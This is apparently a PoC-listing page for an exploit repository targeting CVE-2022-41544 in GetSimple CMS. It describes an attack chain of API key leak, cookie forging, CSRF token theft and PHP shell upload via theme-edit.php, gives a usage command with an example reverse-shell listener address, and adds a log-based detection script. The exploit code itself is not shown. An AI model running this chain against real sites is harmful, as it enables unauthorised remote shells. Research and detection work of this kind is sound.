
CVE-2022-41544 PoC — GetSimple CMS security vulnerability

Source
Associated Vulnerability
Title: GetSimple CMS security vulnerability (CVE-2022-41544)
Description: GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php.
Description
Exploit script for CVE-2022-41544 in GetSimple CMS, with enhanced error handling and detailed usage instructions.
Readme
# CVE-2022-41544 Exploit Script

This repository contains a script that exploits the CVE-2022-41544 vulnerability in GetSimple CMS. The script performs several steps in sequence: check the target version, leak the API key, set the session cookies, obtain a CSRF token, upload a shell, and trigger the shell.

## Changes and Improvements

1. **Deprecation Warning Handling**: Removed the deprecated `telnetlib` import as it was not necessary for the script's functionality.
2. **Enhanced Error Handling**: Added more robust error handling for HTTP requests and XML parsing.
3. **Improved User Feedback**: Provided detailed feedback for each step to help users understand the script's progress and any issues encountered.
4. **Input Validation**: Ensured that the user inputs for the target, path, and credentials are validated.
5. **Documentation and Comments**: Added comments and documentation to improve code readability and usability.

## Usage

1. **Clone the Repository**:
    ```bash
    git clone https://github.com/n3rdyn3xus/CVE-2022-41544.git
    cd CVE-2022-41544
    ```

2. **Install Dependencies**:
    Ensure you have Python 3 installed along with the `requests` library.
    ```bash
    pip3 install requests
    ```

3. **Run the Script**:
    ```bash
    python3 CVE-2022-41544.py <target> <path> <ip:port> <username>
    ```

    - `<target>`: The target domain or IP address.
    - `<path>`: The path to the GetSimple CMS installation.
    - `<ip:port>`: The IP and port for the reverse shell.
    - `<username>`: The admin username for the GetSimple CMS.

    Example:
    ```bash
    python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin
    ```
![image](https://github.com/user-attachments/assets/ddf85b4b-664c-4f88-8692-356cbe38b447)

![image](https://github.com/user-attachments/assets/31b056df-9df9-452f-94f2-a7ebd96c1576)


## Script Overview

### Functions

- `print_the_banner()`: Displays a stylized banner using ASCII art.
- `get_version(target, path)`: Checks if the target version of GetSimple CMS is vulnerable.
- `api_leak(target, path)`: Attempts to retrieve an API key from an authorization XML file.
- `set_cookies(username, version, apikey)`: Sets cookies required for further requests based on the retrieved API key.
- `get_csrf_token(target, path, headers)`: Extracts a CSRF token necessary for uploading a shell.
- `upload_shell(target, path, headers, nonce, shell_content)`: Uploads a PHP shell to the target server.
- `shell_trigger(target, path)`: Triggers the uploaded shell to establish a reverse shell connection.

### Main Function

The `main()` function orchestrates the entire process by calling the above functions in sequence to exploit the CVE-2022-41544 vulnerability.
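As an added defender-side example (not part of this repository or of GetSimple), the function sequence above maps to a request chain that is visible in web server access logs: a read of the authorization XML, a POST to `admin/theme-edit.php`, then a request for the PHP file written under the theme directory. The log lines below are constructed; the authorization XML location and the `/theme/` directory are assumptions to adjust for your installation.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined format); hosts and paths are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /CMS/data/other/authorization.xml HTTP/1.1" 200 312 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "POST /CMS/admin/theme-edit.php HTTP/1.1" 200 1024 "-" "python-requests/2.31"
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /CMS/theme/Innovation/shell.php HTTP/1.1" 200 0 "-" "python-requests/2.31"
198.51.100.9 - - [10/Oct/2023:14:01:05 +0000] "POST /CMS/admin/theme-edit.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# theme-edit.php is the endpoint from the advisory; the XML location and theme dir are assumed.
INDICATORS = [
    ("apikey_xml_read", "GET", re.compile(r"authorization[^/]*\.xml$", re.I)),
    ("theme_edit_post", "POST", re.compile(r"/admin/theme-edit\.php$", re.I)),
    ("theme_php_request", None, re.compile(r"/theme/.*\.php$", re.I)),
]

def parse_line(line):
    """Return (ip, timestamp, method, path without query string) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0]

def find_theme_edit_chains(log_text, window_seconds=300):
    """IP -> sorted indicator names when a theme-edit POST has company within the window."""
    events = defaultdict(list)  # ip -> [(timestamp, indicator name)]
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path = parsed
        for name, want, pattern in INDICATORS:
            if (want is None or method == want) and pattern.search(path):
                events[ip].append((ts, name))
    window = timedelta(seconds=window_seconds)
    hits = {}
    for ip, evs in events.items():
        posts = [t for t, n in evs if n == "theme_edit_post"]
        # A lone POST is normal admin activity; flag only when other indicators cluster around it.
        related = {n for t, n in evs if any(abs(t - p) <= window for p in posts)}
        if len(related) > 1:
            hits[ip] = sorted(related)
    return hits
```

The legitimate editor at 198.51.100.9 only POSTs to the theme editor and is not reported; the scripted client is reported with all three indicators.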

## Author

This script was developed by Dilanka Kaushal Hewage (**n3rdyn3xus**).

## Disclaimer

This script is provided for educational purposes only. Unauthorized access to systems is illegal and unethical. Use this script responsibly and only on systems you have explicit permission to test.

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

File Snapshot

[4.0K] /data/pocs/2e818c4d2b28ba57d4d2cfcd91f0234a751ae862
├── [4.7K] CVE-2022-41544.py
├── [1.0K] LICENSE
└── [3.0K] README.md

0 directories, 3 files